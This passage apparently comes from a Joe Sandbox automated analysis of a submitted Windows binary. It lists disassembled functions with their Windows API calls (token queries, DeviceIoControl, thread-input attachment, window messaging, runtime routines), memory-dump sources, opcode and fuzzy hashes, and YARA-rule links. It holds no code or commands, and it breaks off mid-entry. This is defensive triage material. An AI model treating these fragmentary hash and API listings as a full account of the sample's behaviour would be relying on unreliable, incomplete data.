                                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0039187A,00000000,000000EF,00000119,?,?,00000000), ref: 00390AD4
                                                                  • lstrcpyW.KERNEL32(00000000,?,?,0039187A,00000000,000000EF,00000119,?,?,00000000), ref: 00390AFA
                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,0039187A,00000000,000000EF,00000119,?,?,00000000), ref: 00390B2E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                  • String ID: cdecl
                                                                  • API String ID: 4031866154-3896280584
                                                                  • Opcode ID: 1bb7c70b9b8e75494270a6dac30b137511495bcdb041faff4138ffa0aad16219
                                                                  • Instruction ID: 8aa8baed659879a8a9c7bb04361ad0b8779f259415264189a5d332513b501363
                                                                  • Opcode Fuzzy Hash: 1bb7c70b9b8e75494270a6dac30b137511495bcdb041faff4138ffa0aad16219
                                                                  • Instruction Fuzzy Hash: A1118136200305AFDF26AF64DC45D7A77A9FF45354B81406AE806CB290EB71D951C7A0
                                                                  Function 00382F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00382FB5
                                                                    • Part of subcall function 0037395C: __FF_MSGBANNER.LIBCMT ref: 00373973
                                                                    • Part of subcall function 0037395C: __NMSG_WRITE.LIBCMT ref: 0037397A
                                                                    • Part of subcall function 0037395C: RtlAllocateHeap.NTDLL(00F90000,00000000,00000001,00000001,00000000,?,?,0036F507,?,0000000E), ref: 0037399F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap_free
                                                                  • String ID:
                                                                  • API String ID: 614378929-0
                                                                  • Opcode ID: 27c603686f28940878411885ff848c91db0a3772422c8ab42df836ce50b2f614
                                                                  • Instruction ID: c8138b4de3946e1b0a21ab71effba1592c1ca384d5afcf8278005ad417c325e6
                                                                  • Opcode Fuzzy Hash: 27c603686f28940878411885ff848c91db0a3772422c8ab42df836ce50b2f614
                                                                  • Instruction Fuzzy Hash: C8110A72449316ABCB333B74AC1466A3BA8AF04760F21C865F94E9E261DB38C940D790
                                                                  Function 0036EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0036EBB2
                                                                    • Part of subcall function 003551AF: _memset.LIBCMT ref: 0035522F
                                                                    • Part of subcall function 003551AF: _wcscpy.LIBCMT ref: 00355283
                                                                    • Part of subcall function 003551AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00355293
                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 0036EC07
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0036EC16
                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003C3C88
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                  • String ID:
                                                                  • API String ID: 1378193009-0
                                                                  • Opcode ID: 9708e4c19cc33fae8960c1d33c77bd12327931969a7d1c38c87d3109706caa1e
                                                                  • Instruction ID: 36e3606b39804177686d0c86ac38458b4394244e5398f625be459453d82821a0
                                                                  • Opcode Fuzzy Hash: 9708e4c19cc33fae8960c1d33c77bd12327931969a7d1c38c87d3109706caa1e
                                                                  • Instruction Fuzzy Hash: E421D7749047849FE7339B28D859FEBBFEC9B05308F05849DE69E96141C3742E888B51
                                                                  Function 0039058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003905AC
                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003905C7
                                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003905DD
                                                                  • FreeLibrary.KERNEL32(?), ref: 00390632
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                  • String ID:
                                                                  • API String ID: 3137044355-0
                                                                  • Opcode ID: 0a80c32fbc369df564ff7dff75084ef32a3d7eb79a0060fa23f7729662b72b85
                                                                  • Instruction ID: 0f2eb2813d52e754904ebd1cce730a131562dfcc217d570baa56b1cf0c5673e9
                                                                  • Opcode Fuzzy Hash: 0a80c32fbc369df564ff7dff75084ef32a3d7eb79a0060fa23f7729662b72b85
                                                                  • Instruction Fuzzy Hash: C8218B71901209EFDF268FA5EC88AEABBBCEF40700F00846EE51696050DB74EA55DF60
                                                                  Function 00396713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00396733
                                                                  • _memset.LIBCMT ref: 00396754
                                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003967A6
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003967AF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                  • String ID:
                                                                  • API String ID: 1157408455-0
                                                                  • Opcode ID: 62028479c8ca8a9541001d06d870d504c05d51641ff4aa7e1074717a73b7b65c
                                                                  • Instruction ID: f7f4d4590da1ed98e00bfb4901a4bcf682ef5e8f77b260a3a0fd61efe3fdd747
                                                                  • Opcode Fuzzy Hash: 62028479c8ca8a9541001d06d870d504c05d51641ff4aa7e1074717a73b7b65c
                                                                  • Instruction Fuzzy Hash: 9611CA759022287AE7315BA5AC4EFABBBBCEF44764F10419AF504E71D0D2744E808B74
                                                                  Function 0038B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0038AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0038AA79
                                                                    • Part of subcall function 0038AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0038AA83
                                                                    • Part of subcall function 0038AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0038AA92
                                                                    • Part of subcall function 0038AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0038AA99
                                                                    • Part of subcall function 0038AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0038AAAF
                                                                  • GetLengthSid.ADVAPI32(?,00000000,0038ADE4,?,?), ref: 0038B21B
                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0038B227
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0038B22E
                                                                  • CopySid.ADVAPI32(?,00000000,?), ref: 0038B247
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                  • String ID:
                                                                  • API String ID: 4217664535-0
                                                                  • Opcode ID: 81182d55f9217617ef2b662f74a40ed2294614723b0de9d75bdc19a3a3b8fccb
                                                                  • Instruction ID: 40d7d8df1df629b92cef1535bf116b01e1c3077f84952888112e3e4570b2c04e
                                                                  • Opcode Fuzzy Hash: 81182d55f9217617ef2b662f74a40ed2294614723b0de9d75bdc19a3a3b8fccb
                                                                  • Instruction Fuzzy Hash: D9119E71A01306EFDB46AF98DC85AAEB7ADEF85314F1584AEE94297210D731AE44CB10
                                                                  Function 0038B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0038B498
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0038B4AA
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0038B4C0
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0038B4DB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 45a6b7e9f6e2e40d53470ad231ab64ecb9772a92608adaf0d85e2f7013d74e04
                                                                  • Instruction ID: 529b00e8e861d34aaaa65ed9d8b3e630fe1097256c72bc5401d304d7da78b232
                                                                  • Opcode Fuzzy Hash: 45a6b7e9f6e2e40d53470ad231ab64ecb9772a92608adaf0d85e2f7013d74e04
                                                                  • Instruction Fuzzy Hash: 1D11487A900219FFDB11DFA9C881E9DBBB8FB08710F204091E604B7290D771AE10DB94
                                                                  Function 0036B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036B34E: GetWindowLongW.USER32(?,000000EB), ref: 0036B35F
                                                                  • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0036B5A5
                                                                  • GetClientRect.USER32(?,?), ref: 003CE69A
                                                                  • GetCursorPos.USER32(?), ref: 003CE6A4
                                                                  • ScreenToClient.USER32(?,?), ref: 003CE6AF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 4127811313-0
                                                                  • Opcode ID: feb17d001268b93084ad7489c73d40f8ada52b1d393fb7da7eaeb7cfbb27ca61
                                                                  • Instruction ID: 96c6b6d9b174c16cc1c4e5bbd37b6ebe54f3a1d38583a7796217f58ddecfdb53
                                                                  • Opcode Fuzzy Hash: feb17d001268b93084ad7489c73d40f8ada52b1d393fb7da7eaeb7cfbb27ca61
                                                                  • Instruction Fuzzy Hash: B5114C31501129BFCB12EF54DC45DEEB7BDEB09304F104456FA02E7140D334AA91CBA5
                                                                  Function 0039732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00397352
                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00397385
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0039739B
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003973A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                  • String ID:
                                                                  • API String ID: 2880819207-0
                                                                  • Opcode ID: 8c874da440a04e26417240582f5ebd37dd791147b8b8425eb04e7912a4d4e406
                                                                  • Instruction ID: 3153f3074de9d9be38ca3aa580e789c0510631d90a75afb556b18562a8d8dd0a
                                                                  • Opcode Fuzzy Hash: 8c874da440a04e26417240582f5ebd37dd791147b8b8425eb04e7912a4d4e406
                                                                  • Instruction Fuzzy Hash: F1110876A04204BFDB039FACEC49AEE7BADAB44311F048366F825D3291D7708D0087A4
                                                                  Function 0036D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0036D1BA
                                                                  • GetStockObject.GDI32(00000011), ref: 0036D1CE
                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 0036D1D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                  • String ID:
                                                                  • API String ID: 3970641297-0
                                                                  • Opcode ID: c8a89aa630a46a9be1b4dbaf179715ffe2c5617dbadf02c53f18ba297dbfc675
                                                                  • Instruction ID: dd8956946064e122781b1e3c1e57e110fc55030d19217fe6273614a7b7c1e595
                                                                  • Opcode Fuzzy Hash: c8a89aa630a46a9be1b4dbaf179715ffe2c5617dbadf02c53f18ba297dbfc675
                                                                  • Instruction Fuzzy Hash: 8111AD72A02509BFEB534F90EC50EEABB6DFF09364F058116FA0596064C771DD609BA0
                                                                  Function 00384DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                  • String ID:
                                                                  • API String ID: 3016257755-0
                                                                  • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                  • Instruction ID: 87edde761e02c6afbfa023e9542dfd2debee31cf80d28e17c5827c7c95da0541
                                                                  • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                  • Instruction Fuzzy Hash: 9F014C3600024EBBCF136E94DC018EE3F27BB18350B598495FE1859431D336EAB1AB81
                                                                  Function 00377452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00377A0D: __getptd_noexit.LIBCMT ref: 00377A0E
                                                                  • __lock.LIBCMT ref: 0037748F
                                                                  • InterlockedDecrement.KERNEL32(?), ref: 003774AC
                                                                  • _free.LIBCMT ref: 003774BF
                                                                  • InterlockedIncrement.KERNEL32(00FA6C28), ref: 003774D7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                  • String ID:
                                                                  • API String ID: 2704283638-0
                                                                  • Opcode ID: 75c62904f7d537bf7c2c6b7aeb10e4a97c273b6d8f64b83ed44ff2f31f52eae9
                                                                  • Instruction ID: 836d18d6d1cf3d775c5cca68118c6536e910aa450a5a1b69208bde738c94ba9b
                                                                  • Opcode Fuzzy Hash: 75c62904f7d537bf7c2c6b7aeb10e4a97c273b6d8f64b83ed44ff2f31f52eae9
                                                                  • Instruction Fuzzy Hash: 9B016132A0AB1197DB37AF66A50576DBB60BB04710F16C015F81C7BA90C73C5951CFD6
                                                                  Function 003BEA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0036AFE3
                                                                    • Part of subcall function 0036AF83: SelectObject.GDI32(?,00000000), ref: 0036AFF2
                                                                    • Part of subcall function 0036AF83: BeginPath.GDI32(?), ref: 0036B009
                                                                    • Part of subcall function 0036AF83: SelectObject.GDI32(?,00000000), ref: 0036B033
                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 003BEA8E
                                                                  • LineTo.GDI32(00000000,?,?), ref: 003BEA9B
                                                                  • EndPath.GDI32(00000000), ref: 003BEAAB
                                                                  • StrokePath.GDI32(00000000), ref: 003BEAB9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                  • String ID:
                                                                  • API String ID: 1539411459-0
                                                                  • Opcode ID: 3bfc31b8476d61edc00c05e3b8755bac1d6b542ce5a5e96e21928b0c24841bb7
                                                                  • Instruction ID: 0c59fd9b8e1615bffc2828d7e0cf4331e6fa3e38726e3722cacd8aede59f32eb
                                                                  • Opcode Fuzzy Hash: 3bfc31b8476d61edc00c05e3b8755bac1d6b542ce5a5e96e21928b0c24841bb7
                                                                  • Instruction Fuzzy Hash: BDF05E31106259BBDB139FA8AC09FCE3F1DAF06311F088102FB11650E1C7755561CB99
                                                                  Function 0038C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0038C84A
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0038C85D
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0038C864
                                                                  • AttachThreadInput.USER32(00000000), ref: 0038C86B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                  • String ID:
                                                                  • API String ID: 2710830443-0
                                                                  • Opcode ID: 32e245ed4dc6c56615818d82ea60119038807583008496967479ca7e7017671b
                                                                  • Instruction ID: d9831d8f8a12d36bdc2321e21293b0e7f5600449525545cfc8dad023c616aa1e
                                                                  • Opcode Fuzzy Hash: 32e245ed4dc6c56615818d82ea60119038807583008496967479ca7e7017671b
                                                                  • Instruction Fuzzy Hash: 4DE06571146324B6DB122B61EC0DEDB7F1CEF057A1F408012B50D84451C771C580C7F0
                                                                  Function 0038B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentThread.KERNEL32 ref: 0038B0D6
                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,0038AC9D), ref: 0038B0DD
                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0038AC9D), ref: 0038B0EA
                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,0038AC9D), ref: 0038B0F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                  • String ID:
                                                                  • API String ID: 3974789173-0
                                                                  • Opcode ID: 27990a550c1c333a2c7bb747815441d4447d74cc3678df37aa15ca8bee7d1911
                                                                  • Instruction ID: 542499f6a468b3f85887413bd39458ad88cf84a01d17bc295b34490a6bd971d9
